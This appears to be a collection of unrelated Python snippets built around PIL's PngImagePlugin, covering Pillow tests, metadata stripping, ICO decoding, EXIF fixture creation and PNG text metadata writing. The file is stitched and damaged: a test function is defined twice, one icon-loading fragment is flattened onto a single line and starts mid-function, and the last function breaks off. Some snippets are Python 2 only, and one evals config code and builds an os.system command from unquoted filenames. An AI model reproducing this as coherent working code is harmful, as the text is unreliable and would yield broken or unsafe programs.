def test_roundtrip_itxt(self):
    """Verify that iTXt text chunks survive a save/load roundtrip."""
    source = Image.new("RGB", (32, 32))
    png_info = PngImagePlugin.PngInfo()
    # One plain iTXt entry and one zipped entry built from an iTXt instance.
    png_info.add_itxt("spam", "Eggs", "en", "Spam")
    png_info.add_text("eggs", PngImagePlugin.iTXt("Spam", "en", "Eggs"), zip=True)
    reloaded = roundtrip(source, pnginfo=png_info)
    # Both the plain-dict view and the typed text view must be intact.
    self.assertEqual(reloaded.info, {"spam": "Eggs", "eggs": "Spam"})
    self.assertEqual(reloaded.text, {"spam": "Eggs", "eggs": "Spam"})
    self.assertEqual(reloaded.text["spam"].lang, "en")
    self.assertEqual(reloaded.text["spam"].tkey, "Spam")
    self.assertEqual(reloaded.text["eggs"].lang, "en")
    self.assertEqual(reloaded.text["eggs"].tkey, "Eggs")
def test_invalid_file(self):
    """Opening a JPEG through the PNG plugin must raise SyntaxError."""
    bad_path = "Tests/images/flower.jpg"
    with pytest.raises(SyntaxError):
        PngImagePlugin.PngImageFile(bad_path)
def test_invalid_file(self):
    """Opening a JPEG through the PNG plugin must raise SyntaxError."""
    bad_path = "Tests/images/flower.jpg"
    # Context-manager form of assertRaises replaces the lambda wrapper.
    with self.assertRaises(SyntaxError):
        PngImagePlugin.PngImageFile(bad_path)
def remove_image_metadata(filename: Path) -> None:
	"""
	Remove exif metadata from an image.

	INPUTS
	filename: A filename of an image

	OUTPUTS
	None.
	"""
	if filename.suffix in (".xcf", ".svg"):
		# Skip GIMP XCF and SVG files
		return

	if filename.suffix == ".jpg":
		# JPEG images are lossy, and PIL will recompress them on save.
		# Instead of using PIL, read the byte stream and remove all metadata that way.
		# Inspired by https://github.com/hMatoba/Piexif
		# See https://www.disktuna.com/list-of-jpeg-markers/
		# and https://exiftool.org/TagNames/JPEG.html
		# These are the 15 "app" segments, EXCEPT app 14, as well as the "comment" segment.
		# This mirrors what exiftool does.
		# Fix: this list is loop-invariant — hoisted out of the segment-scan loop
		# instead of being rebuilt on every iteration.
		metadata_segments = [b"\xff\xe1", b"\xff\xe2", b"\xff\xe3", b"\xff\xe4",
					b"\xff\xe5", b"\xff\xe6", b"\xff\xe7", b"\xff\xe8",
					b"\xff\xe9", b"\xff\xea", b"\xff\xeb", b"\xff\xec",
					b"\xff\xed", b"\xff\xef", b"\xff\xfe"]

		with open(filename, "rb+") as file:
			jpeg_data = file.read()

			# A JPEG must start with the SOI marker.
			if jpeg_data[0:2] != b"\xff\xd8":
				raise se.InvalidFileException(f"Invalid JPEG file: [path][link=file://{filename.resolve()}](unknown)[/].")

			exif_segments = []
			head = 2

			# Get a list of metadata segments from the jpg
			while True:
				# Stop at the SOS marker; compressed image data follows it.
				if jpeg_data[head: head + 2] == b"\xff\xda":
					break

				# Each segment stores its own big-endian length right after the marker.
				length = struct.unpack(">H", jpeg_data[head + 2: head + 4])[0]
				end_point = head + length + 2
				seg = jpeg_data[head: end_point]
				head = end_point

				# Running past the end of the stream means the structure is corrupt.
				if head >= len(jpeg_data):
					raise se.InvalidFileException(f"Invalid JPEG file: [path][link=file://{filename.resolve()}](unknown)[/].")

				if seg[0:2] in metadata_segments:
					exif_segments.append(seg)

			# Now replace those segments with nothing.
			# NOTE(review): bytes.replace removes *every* occurrence of the segment
			# bytes; an identical byte run inside the scan data would also be removed.
			# Kept as-is to preserve existing behavior — confirm with upstream.
			for segment in exif_segments:
				jpeg_data = jpeg_data.replace(segment, b"")

			file.seek(0)
			file.write(jpeg_data)
			file.truncate()
	else:
		# PNG and other image types we expect are lossless so we can use PIL to remove metadata
		try:
			image = Image.open(filename)
		except UnidentifiedImageError as ex:
			raise se.InvalidFileException(f"Couldn’t identify image type of [path][link=file://{filename.resolve()}](unknown)[/].") from ex

		# Fix: use the image as a context manager so the file handle is
		# released even if a save below raises.
		with image:
			# Copying only the pixel data drops all ancillary metadata.
			data = list(image.getdata())
			image_without_exif = Image.new(image.mode, image.size)
			image_without_exif.putdata(data)

			if image.format == "PNG":
				# Some metadata, like chromaticity and gamma, are useful to preserve in PNGs
				new_exif = PngImagePlugin.PngInfo()
				for key, value in image.info.items():
					if key.lower() == "gamma":
						# gAMA stores gamma × 100000 as one unsigned 32-bit int.
						new_exif.add(b"gAMA", struct.pack("!1I", int(value * 100000)))
					elif key.lower() == "chromaticity":
						# cHRM stores 8 fixed-point values, each × 100000.
						new_exif.add(b"cHRM", struct.pack("!8I",
									*(int(value[i] * 100000) for i in range(8))))

				image_without_exif.save(filename, optimize=True, pnginfo=new_exif)
			elif image.format == "TIFF":
				# For some reason, when saving as TIFF we have to cast filename to str() otherwise
				# the save driver throws an exception
				image_without_exif.save(str(filename), compression="tiff_adobe_deflate")
			else:
				image_without_exif.save(str(filename))
def test_getchunks(self):
    """The hopper image must serialise to exactly three PNG chunks."""
    image = hopper()
    chunk_list = PngImagePlugin.getchunks(image)
    self.assertEqual(len(chunk_list), 3)
def frame(self, idx):
    """
    Get an image from frame idx.

    Decodes one icon frame from self.buf: either an embedded PNG
    (Vista-style icons) or a classic XOR bitmap plus 1-bit AND mask,
    returning an RGBA image with the mask applied as the alpha channel.
    """
    header = self.entry[idx]
    self.buf.seek(header['offset'])
    data = self.buf.read(8)
    # Rewind so the chosen decoder reads the frame from its start.
    self.buf.seek(header['offset'])
    if data[:8] == PngImagePlugin._MAGIC:
        # png frame
        im = PngImagePlugin.PngImageFile(self.buf)
    else:
        # XOR + AND mask bmp frame
        im = BmpImagePlugin.DibImageFile(self.buf)
        # change tile dimension to only encompass XOR image
        # (the DIB header height covers both the XOR and AND images).
        im.size = (im.size[0], int(im.size[1] / 2))
        d, e, o, a = im.tile[0]
        im.tile[0] = d, (0, 0) + im.size, o, a
        # figure out where AND mask image starts
        mode = a[0]
        bpp = 8
        # Map the raw-decoder mode back to its bit depth via BIT2MODE.
        for k in BmpImagePlugin.BIT2MODE.keys():
            if mode == BmpImagePlugin.BIT2MODE[k][1]:
                bpp = k
                break
        if 32 == bpp:
            # 32-bit color depth icon image allows semitransparent areas
            # PIL's DIB format ignores transparency bits, recover them.
            # The DIB is packed in BGRX byte order where X is the alpha
            # channel.
            # Back up to start of bmp data
            self.buf.seek(o)
            # extract every 4th byte (eg. 3,7,11,15,...)
            alpha_bytes = self.buf.read(im.size[0] * im.size[1] * 4)[3::4]
            # convert to an 8bpp grayscale image
            mask = Image.frombuffer(
                'L',            # 8bpp
                im.size,        # (w, h)
                alpha_bytes,    # source chars
                'raw',          # raw decoder
                ('L', 0, -1)    # 8bpp inverted, unpadded, reversed
            )
        else:
            # get AND image from end of bitmap
            w = im.size[0]
            if (w % 32) > 0:
                # bitmap row data is aligned to word boundaries
                w += 32 - (im.size[0] % 32)
            # the total mask data is
            # padded row size * height / bits per char
            and_mask_offset = o + int(im.size[0] * im.size[1] * (bpp / 8.0))
            total_bytes = int((w * im.size[1]) / 8)
            self.buf.seek(and_mask_offset)
            maskData = self.buf.read(total_bytes)
            # convert raw data to image
            mask = Image.frombuffer(
                '1',            # 1 bpp
                im.size,        # (w, h)
                maskData,       # source chars
                'raw',          # raw decoder
                ('1;I', int(w / 8), -1)  # 1bpp inverted, padded, reversed
            )
        # now we have two images, im is XOR image and mask is AND image
        # apply mask image as alpha channel
        im = im.convert('RGBA')
        im.putalpha(mask)
    return im
def create_images():
    """
    Build a set of fixture images carrying known metadata (EXIF, PNG text,
    XMP) in several formats, then return a generator of their filenames.

    NOTE(review): relies on module-level names `forbidden_img` and
    `ALLOWED_IMG_EXTENSIONS` that are defined elsewhere in the file.
    """
    # actual image color: 255,0,0
    img = Image.new("RGB", (100, 20), color='red')
    text = ImageDraw.Draw(img)
    text.text((10, 10), "Hello World", fill=(0, 0, 0))
    image_wmeta = 'image_wmeta'
    # thumbnail color: 0,0,255
    o = io.BytesIO()
    secret_thumbnail = Image.new("RGB", (120, 20), color='blue')
    text = ImageDraw.Draw(secret_thumbnail)
    text.text((10, 10), "secret thumbnail", fill=(0, 0, 0))
    # transform it to bytes
    secret_thumbnail.save(o, "jpeg")
    secret_exif_thumbnail = o.getvalue()
    secret_thumbnail.close()
    # forbidden image_extension
    img.save(forbidden_img, "tiff")
    # bmp doesn't contain critical meta information
    img.save(image_wmeta + "_bmp" + '.bmp')
    # for some reasons some of these values don't match the relative specification:
    # rational numbers are separated at the comma, f.e. 13.37 is represented by [(13), (37)]
    # http://www.cipa.jp/std/documents/e/DC-008-2012_E.pdf#page=47 ...
    # http://www.cipa.jp/std/documents/e/DC-008-2012_E.pdf#page=87
    jpg_exif = {
        "0th": {
            piexif.ImageIFD.ImageDescription: u"description",
            piexif.ImageIFD.StripOffsets: 3,
            piexif.ImageIFD.Artist: u"artist",
            piexif.ImageIFD.Copyright: u"copyright holder",
            piexif.ImageIFD.DateTime: u"2012:01:08 10:09:01",
        },
        "Exif": {
            piexif.ExifIFD.DateTimeOriginal: u"2016:08:07 13:37:10",
            piexif.ExifIFD.DateTimeDigitized: u"2015:03:07 14:20:30",
            piexif.ExifIFD.OffsetTime: u"2017:05:09 08:04:04",
            piexif.ExifIFD.OffsetTimeOriginal: u"2017:04:12 18:15:00",
            piexif.ExifIFD.OffsetTimeDigitized: u"2016:02:10 11:10:03",
            piexif.ExifIFD.SubSecTime: u"2017:09:04 10:03:10",
            piexif.ExifIFD.SubSecTimeOriginal: u"2019:10:03 10:03:10",
            piexif.ExifIFD.SubSecTimeDigitized: u"2013:10:03 10:03:10",
            piexif.ExifIFD.CameraOwnerName: u"Cameraname",
            piexif.ExifIFD.BodySerialNumber: u"body serialnumber",
            piexif.ExifIFD.LensSerialNumber: u"lens serialnumber",
            piexif.ExifIFD.UserComment: b"secret comment",
        },
        "GPS": {
            piexif.GPSIFD.GPSLatitudeRef: u"N",
            piexif.GPSIFD.GPSLatitude: [(10, 1), (20, 1), (0, 0)],
            piexif.GPSIFD.GPSLongitudeRef: u"W",
            piexif.GPSIFD.GPSLongitude: [(10, 1), (20, 1), (0, 0)],
            piexif.GPSIFD.GPSAltitudeRef: 0,
            piexif.GPSIFD.GPSAltitude: (200, 1),
            piexif.GPSIFD.GPSTimeStamp: [(10), (3)],
            piexif.GPSIFD.GPSSatellites: u"satellites",
            piexif.GPSIFD.GPSStatus: u"A",
            piexif.GPSIFD.GPSMeasureMode: u"3",
            piexif.GPSIFD.GPSDOP: [(1), (4)],
            piexif.GPSIFD.GPSSpeedRef: u"K",
            piexif.GPSIFD.GPSSpeed: [(42), (10)],
            piexif.GPSIFD.GPSTrackRef: u"T",
            piexif.GPSIFD.GPSTrack: [(21), (123)],
            piexif.GPSIFD.GPSImgDirectionRef: u"T",
            piexif.GPSIFD.GPSImgDirection: [(10), (12)],
            piexif.GPSIFD.GPSMapDatum: u"today",
            piexif.GPSIFD.GPSDestLatitudeRef: u"N",
            piexif.GPSIFD.GPSDestLatitude: [(8, 1), (30, 1), (0, 0)],
            piexif.GPSIFD.GPSDestLongitudeRef: u"E",
            piexif.GPSIFD.GPSDestLongitude: [(8), (30)],
            piexif.GPSIFD.GPSDestBearingRef: u"T",
            piexif.GPSIFD.GPSDestBearing: [(1), (10)],
            piexif.GPSIFD.GPSDestDistanceRef: u"K",
            piexif.GPSIFD.GPSDestDistance: [(10), (3)],
            piexif.GPSIFD.GPSProcessingMethod: b"WLAN",
            piexif.GPSIFD.GPSAreaInformation: b"area",
            piexif.GPSIFD.GPSDateStamp: u"2015:10:03 10:03:10",
            piexif.GPSIFD.GPSDifferential: 1,
            piexif.GPSIFD.GPSHPositioningError: [(2), (0)],
        },
        "1st": {
            piexif.ImageIFD.ImageDescription: u"description",
            piexif.ImageIFD.StripOffsets: 3,
            piexif.ImageIFD.Artist: u"artist",
            piexif.ImageIFD.Copyright: u"copyright holder",
            piexif.ImageIFD.DateTime: u"2013:10:03 10:03:10",
        },
        "thumbnail": secret_exif_thumbnail
    }
    # NOTE(review): the last five keys below (ImageDescription, StripOffsets,
    # Artist, Copyright, DateTime) repeat keys already present at the top of
    # this literal; Python keeps only the later value, so e.g. DateTime ends
    # up as "2013:10:03 10:03:10". Confirm this is intended.
    png_dict = {
        "ImageDescription": u"description",
        "StripOffsets": "3",
        "Artist": u"artist",
        "Copyright": u"copyright holder",
        "DateTime": u"2012:01:08 10:09:01",
        "DateTimeOriginal": u"2016:08:07 13:37:10",
        "DateTimeDigitized": u"2015:03:07 14:20:30",
        "OffsetTime": u"2017:05:09 08:04:04",
        "OffsetTimeOriginal": u"2017:04:12 18:15:00",
        "OffsetTimeDigitized": u"2016:02:10 11:10:03",
        "SubSecTime": u"2017:09:04 10:03:10",
        "SubSecTimeOriginal": u"2019:10:03 10:03:10",
        "SubSecTimeDigitized": u"2013:10:03 10:03:10",
        "CameraOwnerName": u"Cameraname",
        "BodySerialNumber": u"body serialnumber",
        "LensSerialNumber": u"lens serialnumber",
        "UserComment": b"secret comment",
        "GPSLatitudeRef": u"N",
        "GPSLatitude": "3 deg 20' 0.00",
        "GPSLongitudeRef": u"W",
        "GPSLongitude": "3 deg 20.1' 0.00",
        "GPSAltitudeRef": "0",
        "GPSAltitude": "200 m Above Sea Level",
        "GPSTimeStamp": "03:19:59.999999",
        "GPSSatellites": u"satellites",
        "GPSStatus": u"A",
        "GPSMeasureMode": u"3",
        "GPSSpeedRef": u"K",
        "GPSSpeed": "4.2",
        "GPSTrackRef": u"T",
        "GPSTrack": "0.1707317073",
        "GPSImgDirectionRef": u"T",
        "GPSImgDirection": "0.6333333333",
        "GPSMapDatum": u"today",
        "GPSDestLatitudeRef": u"N",
        "GPSDestLatitude": "3 deg 30' 0.00",
        "GPSDestLongitudeRef": u"E",
        "GPSDestLongitude": "0 deg 16' 0.00",
        "GPSDestBearingRef": u"T",
        "GPSDestBearing": "0.1",
        "GPSDestDistanceRef": u"K",
        "GPSDestDistance": "3.333333333",
        "GPSProcessingMethod": b"WLAN",
        "GPSAreaInformation": b"area",
        "GPSDateStamp": u"2015:10:03 10:03:10",
        "GPSDifferential": "1",
        "ImageDescription": u"description",
        "StripOffsets": "3",
        "Artist": u"artist",
        "Copyright": u"copyright holder",
        "DateTime": u"2013:10:03 10:03:10",
    }
    # jpg with exif
    img.save(image_wmeta + '_jpg' + '.jpg', exif=piexif.dump(jpg_exif))
    # copy jpg to jpe, jpeg
    copyfile(image_wmeta + '_jpg' + '.jpg', image_wmeta + '_jpe' + '.jpe')
    copyfile(image_wmeta + '_jpg' + '.jpg', image_wmeta + '_jpeg' + '.jpeg')
    # png exif-part
    png_info = PngImagePlugin.PngInfo()
    # copy png metadata
    for k, v in png_dict.items():
        png_info.add_text(k, v, 0)
    img.save(image_wmeta + '_png' + '.png', "PNG", pnginfo=png_info)
    img.save(image_wmeta + '_gif' + '.gif')
    img.close()
    # xmp for gif and png
    xmp = XMPMeta()
    xmp.append_array_item(consts.XMP_NS_DC, 'secret', 'secret information', {
        'prop_array_is_ordered': True,
        'prop_value_is_array': True
    })
    # gif xmp
    gif_image = XMPFiles(file_path=image_wmeta + '_gif' + ".gif",
                         open_forupdate=True)
    gif_image.put_xmp(xmp)
    gif_image.close_file()
    # png part 2
    png_image = XMPFiles(file_path=image_wmeta + '_png' + ".png",
                         open_forupdate=True)
    png_image.put_xmp(xmp)
    png_image.close_file()
    # Lazily yield the generated filenames for every allowed extension.
    return ((image_wmeta + '_' + suffix + "." + suffix) for suffix in ALLOWED_IMG_EXTENSIONS)
def addFlag(self, flag):
    """Wrap *flag* in PNG text metadata (key 'additionalInfo') and store it on self.flag."""
    info = PngImagePlugin.PngInfo()
    info.add_text("additionalInfo", flag)
    self.flag = info
def load_icon(file, index=None):
    '''
    Load Windows ICO image.

    See http://en.wikipedia.org/w/index.php?oldid=264332061 for file format
    description.

    NOTE(review): this is Python 2 code (`basestring`, `xrange`,
    `Image.fromstring`) — it will not run unmodified on Python 3.

    file  -- path string or binary file object.
    index -- directory entry to load; None picks the "best" (largest) icon.
    Returns an RGBA PIL image with the AND mask applied as alpha.
    '''
    if isinstance(file, basestring):
        file = open(file, 'rb')

    header = struct.unpack('<3H', file.read(6))

    # Check magic: reserved word 0 then type 1 (icon).
    if header[:2] != (0, 1):
        raise SyntaxError('Not an ICO file')

    # Collect icon directories
    directories = []
    for i in xrange(header[2]):
        directory = list(struct.unpack('<4B2H2I', file.read(16)))
        # Width/height/palette bytes of 0 actually mean 256.
        for j in xrange(3):
            if not directory[j]:
                directory[j] = 256
        directories.append(directory)

    if index is None:
        # Select best icon: lexicographic max over (width, height, palette).
        directory = max(directories, key=operator.itemgetter(slice(0, 3)))
    else:
        directory = directories[index]

    # Seek to the bitmap data (directory[7] is the data offset).
    file.seek(directory[7])
    prefix = file.read(16)
    file.seek(-16, 1)

    if PngImagePlugin._accept(prefix):
        # Windows Vista icon with PNG inside
        image = PngImagePlugin.PngImageFile(file)
    else:
        # Load XOR bitmap
        image = BmpImagePlugin.DibImageFile(file)
        if image.mode == 'RGBA':
            # Windows XP 32-bit color depth icon without AND bitmap
            pass
        else:
            # Patch up the bitmap height: the DIB height includes the AND mask.
            image.size = image.size[0], image.size[1] >> 1
            d, e, o, a = image.tile[0]
            image.tile[0] = d, (0, 0) + image.size, o, a

            # Calculate AND bitmap dimensions. See
            # http://en.wikipedia.org/w/index.php?oldid=264236948#Pixel_storage
            # for description
            offset = o + a[1] * image.size[1]
            stride = ((image.size[0] + 31) >> 5) << 2
            size = stride * image.size[1]

            # Load AND bitmap
            file.seek(offset)
            string = file.read(size)
            mask = Image.fromstring('1', image.size, string, 'raw',
                                    ('1;I', stride, -1))

            image = image.convert('RGBA')
            image.putalpha(mask)

    return image
def writeMetadate(filename, data, key='gb_params'):
    """
    Embed *data* (JSON-serialised) into a PNG file's text metadata.

    Args:
        filename: path of the PNG image to read and rewrite in place.
        data: any JSON-serialisable object.
        key: tEXt key under which the payload is stored (default 'gb_params').
    """
    meta = PngImagePlugin.PngInfo()
    json_data = json.dumps(data)
    meta.add_text(key, json_data)
    # Bug fix: the original called im.save(filname, ...) — an undefined name
    # (typo for `filename`) that raised NameError at runtime.  Also use a
    # context manager so the source file handle is always released.
    with Image.open(filename) as im:
        im.save(filename, "PNG", pnginfo=meta)
def get_disp_and_uncertainty(
    filenames,
    use_filtering,
    v_threshold,
    max_v_fail,
    fbc_threshold,
    min_fbc_pass,
    range_threshold,
):
    """
    Convert forward/backward optical flow into quantised disparity maps plus
    forward-backward-consistency uncertainty maps, written as PNGs.

    For each name in *filenames*, reads "flow_forward/<name>.flo" and
    "flow_backward/<name>.flo", optionally rejects frames that fail the
    vertical-flow / flow-range / consistency filters, then writes
    "disparity/<name>.png" (uint16, with offset/scale stored as PNG text)
    and "uncertainty/<name>.png" (uint8).
    """
    for i, filename in enumerate(filenames):
        print(f"{i + 1} / {len(filenames)}: (unknown)")
        # read flow
        u_fw, v_fw = read_flow("flow_forward/" + filename + ".flo")
        u_bw, v_bw = read_flow("flow_backward/" + filename + ".flo")
        if use_filtering:
            # Reject frames where too many pixels have large vertical flow
            # (a rectified stereo pair should have mostly horizontal flow).
            check_v_fw = abs(v_fw) > v_threshold
            v_fail_fw = 1.0 * np.count_nonzero(check_v_fw) / v_fw.size
            if v_fail_fw >= max_v_fail:
                print("v_fail_fw too large")
                continue
            check_v_bw = abs(v_bw) > v_threshold
            v_fail_bw = 1.0 * np.count_nonzero(check_v_bw) / v_bw.size
            if v_fail_bw >= max_v_fail:
                print("v_fail_bw too large")
                continue
            # Reject frames with too little horizontal-flow variation.
            range_fw = u_fw.max() - u_fw.min()
            if range_fw <= range_threshold:
                print("range_u_fw too small")
                continue
            range_bw = u_bw.max() - u_bw.min()
            if range_bw <= range_threshold:
                print("range_u_bw too small")
                continue
        # compute uncertainty and disparity:
        # warp the (negated) backward flow into the forward frame and compare.
        ind_y, ind_x = np.indices(u_fw.shape, dtype=np.float32)
        y_map = ind_y
        x_map = ind_x + u_fw
        flow_flipped_and_warped = cv2.remap(
            -u_bw,
            x_map,
            y_map,
            interpolation=cv2.INTER_LINEAR,
            borderMode=cv2.BORDER_REPLICATE,
        )
        uncertainty = abs(u_fw - flow_flipped_and_warped)
        if use_filtering:
            # Keep only frames where enough pixels pass the FB-consistency check.
            valid = uncertainty < fbc_threshold
            fbc_pass = 1.0 * np.count_nonzero(valid) / uncertainty.size
            if fbc_pass <= min_fbc_pass:
                print("fbc_pass too small")
                continue
        disp = -u_fw
        # downsample disparity and uncertainty
        downscaling = 0.5
        disp = cv2.resize(
            disp, None, fx=downscaling, fy=downscaling, interpolation=cv2.INTER_LINEAR
        )
        # Disparity values scale with image width, so rescale after resizing.
        disp = disp * downscaling
        uncertainty = cv2.resize(
            uncertainty,
            None,
            fx=downscaling,
            fy=downscaling,
            interpolation=cv2.INTER_LINEAR,
        )
        uncertainty = uncertainty * downscaling
        # quantize disparity and uncertainty:
        # map [disp_min, disp_max] onto the full uint16 range and record the
        # inverse transform (offset/scale) in PNG text metadata.
        disp_max = disp.max()
        disp_min = disp.min()
        if disp_max - disp_min > 0:
            disp = np.round((disp - disp_min) / (disp_max - disp_min) * 65535).astype(
                np.uint16
            )
            scale = 1.0 * (disp_max - disp_min) / 65535
            offset = disp_min
        else:
            # Constant disparity: store zeros with identity scale.
            disp = (0 * disp).astype(np.uint16)
            offset = disp_min
            scale = 1.0
        meta = PngImagePlugin.PngInfo()
        meta.add_text("offset", str(offset))
        meta.add_text("scale", str(scale))
        # Uncertainty is stored as uint8 in tenths, clamped at 255.
        uncertainty = (10 * uncertainty).round()
        uncertainty[uncertainty > 255] = 255
        # save disparity and uncertainty
        disp_name = "disparity/" + filename + ".png"
        if not os.path.exists(os.path.dirname(disp_name)):
            os.makedirs(os.path.dirname(disp_name))
        imageio.imwrite(disp_name, disp, pnginfo=meta, prefer_uint8=False)
        uncertainty_name = "uncertainty/" + filename + ".png"
        if not os.path.exists(os.path.dirname(uncertainty_name)):
            os.makedirs(os.path.dirname(uncertainty_name))
        imageio.imwrite(uncertainty_name, uncertainty.astype(np.uint8))
def picturesave(savename, directory='./', meta=None, extras=[], backup=False,
    dpi=300, form='png', version=False, pdf=False, tight=True, pad_inches=0,
    figure_held=None, loud=True, redacted=False):
    """
    Function which saves the global matplotlib figure without overwriting.
    !Note that saving tuples get converted to lists in the metadata so if you
    notice that your plotter is not overwriting then this is probably why.

    NOTE(review): `extras=[]` is a mutable default argument — harmless here
    only because it is never mutated; consider `extras=None` regardless.
    """
    #! amazing bug: if you keep a comma after meta it makes it a tuple and then there must be a
    #! one-way conversion to dict when it is written to the metadata of the image and this causes
    #! the figure counts to keep increasing no matter what. a very subtle error! corrected below
    if type(meta) == tuple:
        if len(meta) != 1 or type(meta[0]) != dict:
            raise Exception('meta must be a dict')
        else:
            meta = meta[0]
    #---automatically share images with group members (note that you could move this to config)
    os.umask(0o002)
    #---earlier import allows users to set Agg so we import here, later
    import matplotlib as mpl
    import matplotlib.pyplot as plt
    #---intervene here to check the workspace for picture-saving "hooks" that apply to all new pictures
    #---! is it necessary to pass the workspace here?
    if 'work' in globals() and 'picture_hooks' in work.metadata.variables:
        extra_meta = work.metadata.variables['picture_hooks']
        #---redundant keys are not allowed: either they are in picture_hooks or passed to picturesave
        redundant_extras = [i for i in extra_meta if i in meta]
        if any(redundant_extras):
            raise Exception(
                'keys "%r" are incoming via meta but are already part of picture_hooks'
                % redundant_extras)
    #---redacted figures have blurred labels
    if redacted:
        directory_redacted = os.path.join(directory, 'REDACTED')
        if not os.path.isdir(directory_redacted):
            os.mkdir(directory_redacted)
        directory = directory_redacted
        status('you have requested redacted figures, so they are saved to %s' % directory,
            tag='warning')
        import random
        color_back = work.metadata.director.get('redacted_background_color', '')
        color_fore = work.metadata.director.get('redacted_foreground_color', 'k')
        if 'redacted_scrambler' in work.metadata.director:
            scrambler_code = work.metadata.director['redacted_scrambler']
            # NOTE(review): eval of config-supplied code — trusted input only;
            # the bare except below hides the real evaluation error.
            try:
                scrambler = eval(scrambler_code)
                scrambler('test text')
            except:
                raise Exception(
                    'failed to evaluate your `redacted_scrambler` from the director: `%s`'
                    % scrambler_code)
        else:
            #! method below is deprecated because it looks silly. best to use hashes
            if False:
                scrambler = lambda x, max_len=12: ''.join(
                    [chr(ord('a') + random.randint(0, 25)) for i in x][:max_len])
            # Default scrambler: replace text with '#' of the same (capped) length.
            scrambler = lambda x, max_len=10: ('#' * len(x))[:max_len]
        num_format = re.compile("^[\-]?[1-9][0-9]*\.?[0-9]+$")
        isnumber = lambda x: re.match(num_format, x)
        # Scramble every non-numeric text object in the current figure.
        for obj in [i for i in plt.findobj() if type(i) == mpl.text.Text]:
            text_this = obj.get_text()
            if text_this != '' and not isnumber(text_this):
                obj.set_text(scrambler(text_this))
                if color_back:
                    obj.set_backgroundcolor(color_back)
                obj.set_color(color_fore)
    #---if version then we choose savename based on the next available index
    if version:
        #---check for this meta
        search = picturefind(savename, directory=directory, meta=meta, loud=loud)
        if not search:
            # NOTE(review): `meta == None` — PEP 8 prefers `meta is None`.
            if meta == None:
                raise Exception('[ERROR] versioned image saving requires meta')
            fns = glob.glob(os.path.join(directory, savename + '.v*'))
            nums = [
                int(re.findall('^.+\.v([0-9]+)\.png', fn)[0]) for fn in fns
                if re.match('^.+\.v[0-9]+\.png', fn)
            ]
            ind = max(nums) + 1 if nums != [] else 1
            savename += '.v%d' % ind
        else:
            savename = re.findall('(.+)\.[a-z]+', os.path.basename(search))[0]
    #---backup if necessary
    savename += '.' + form
    base_fn = os.path.join(directory, savename)
    if loud:
        status('saving picture to %s' % savename, tag='store')
    if os.path.isfile(base_fn) and backup:
        # Find the first free .bakNN slot (up to 99 copies).
        for i in range(1, 100):
            latestfile = '.'.join(base_fn.split('.')[:-1]) + '.bak' + (
                '%02d' % i) + '.' + base_fn.split('.')[-1]
            if not os.path.isfile(latestfile):
                break
        if i == 99 and os.path.isfile(latestfile):
            raise Exception('except: too many copies')
        else:
            if loud:
                status('backing up ' + base_fn + ' to ' + latestfile, tag='store')
            os.rename(base_fn, latestfile)
    #---intervene to use the PDF backend if desired
    #---...this is particularly useful for the hatch-width hack
    #---...(search self.output(0.1, Op.setlinewidth) in
    #---...python2.7/site-packages/matplotlib/backends/backend_pdf.py and raise it to e.g. 3.0)
    if pdf and form != 'png':
        raise Exception('can only use PDF conversion when writing png')
    elif pdf:
        alt_name = re.sub('.png$', '.pdf', savename)
        #---holding the figure allows other programs e.g. ipython notebooks to show and save the figure
        (figure_held if figure_held else plt).savefig(
            alt_name,
            dpi=dpi,
            bbox_extra_artists=extras,
            bbox_inches='tight' if tight else None,
            pad_inches=pad_inches if pad_inches else None,
            format=form)
        #---convert pdf to png (requires ImageMagick `convert` on the PATH)
        os.system('convert -density %d %s %s' % (dpi, alt_name, base_fn))
        os.remove(alt_name)
    else:
        (figure_held if figure_held else plt).savefig(
            base_fn,
            dpi=dpi,
            bbox_extra_artists=extras,
            bbox_inches='tight' if tight else None,
            pad_inches=pad_inches if pad_inches else None,
            format=form)
    plt.close()
    #---add metadata to png
    if form == 'png' and meta != None:
        im = Image.open(base_fn)
        imgmeta = PngImagePlugin.PngInfo()
        imgmeta.add_text('meta', json.dumps(meta))
        im.save(base_fn, form, pnginfo=imgmeta)
    else:
        print(
            '[WARNING] you are saving as %s and only png allows metadata-versioned pictures'
            % form)
    return base_fn
directories.append(directory) if index is None: # Select best icon directory = max(directories, key=operator.itemgetter(slice(0, 3))) else: directory = directories[index] # Seek to the bitmap data image_file.seek(directory[7]) prefix = image_file.read(16) image_file.seek(-16, 1) if PngImagePlugin._accept(prefix): # Windows Vista icon with PNG inside try: image = PngImagePlugin.PngImageFile(image_file) except IOError: return else: # Load XOR bitmap try: image = BmpImagePlugin.DibImageFile(image_file) except IOError: return if image.mode == 'RGBA': # Windows XP 32-bit color depth icon without AND bitmap pass else:
def save_figure(self, filepath, filename, plotfig=None, timestamp=None):
    """
    Save a thumbnail figure of a plot as PDF and/or PNG (per self.save_pdf /
    self.save_png), embedding descriptive metadata in each output file.

    filepath  -- directory for the output files.
    filename  -- base filename; its last 4 characters are stripped and
                 replaced with '_fig.pdf' / '_fig.png'.
    plotfig   -- matplotlib figure to save; if None, nothing happens.
    timestamp -- datetime used for CreationDate/ModDate; if None the `time`
                 module itself is stored (see note below).
    """
    # --------------------------------------------------------------------------------------------
    # Save thumbnail figure of plot
    if plotfig is not None:
        # create Metadata
        metadata = dict()
        metadata[
            'Title'] = 'Image produced by qudi-hira: ' + self.module_name
        metadata['Author'] = 'qudi-hira - Software Suite'
        metadata[
            'Subject'] = 'Find more information on: https://github.com/projecthira/qudi-hira'
        metadata[
            'Keywords'] = 'Python 3, Qt, experiment control, automation, measurement, software, framework, modular'
        metadata['Producer'] = 'qudi - Software Suite'
        if timestamp is not None:
            metadata['CreationDate'] = timestamp
            metadata['ModDate'] = timestamp
        else:
            # NOTE(review): this stores the `time` MODULE. It works with the
            # strftime calls below because time.strftime(fmt) formats the
            # current time, mimicking datetime.strftime — but the PDF branch
            # then writes the module object into the PDF info dict. Confirm
            # this fallback is intentional.
            metadata['CreationDate'] = time
            metadata['ModDate'] = time

        if self.save_pdf:
            # determine the PDF-Filename
            fig_fname_vector = os.path.join(filepath,
                                            filename)[:-4] + '_fig.pdf'

            # Create the PdfPages object to which we will save the pages:
            # The with statement makes sure that the PdfPages object is closed properly at
            # the end of the block, even if an Exception occurs.
            with PdfPages(fig_fname_vector) as pdf:
                pdf.savefig(plotfig, bbox_inches='tight', pad_inches=0.05)

                # We can also set the file's metadata via the PdfPages object:
                pdf_metadata = pdf.infodict()
                for x in metadata:
                    pdf_metadata[x] = metadata[x]
            self.log.info(f'Image saved to: \n{fig_fname_vector}')

        if self.save_png:
            # determine the PNG-Filename and save the plain PNG
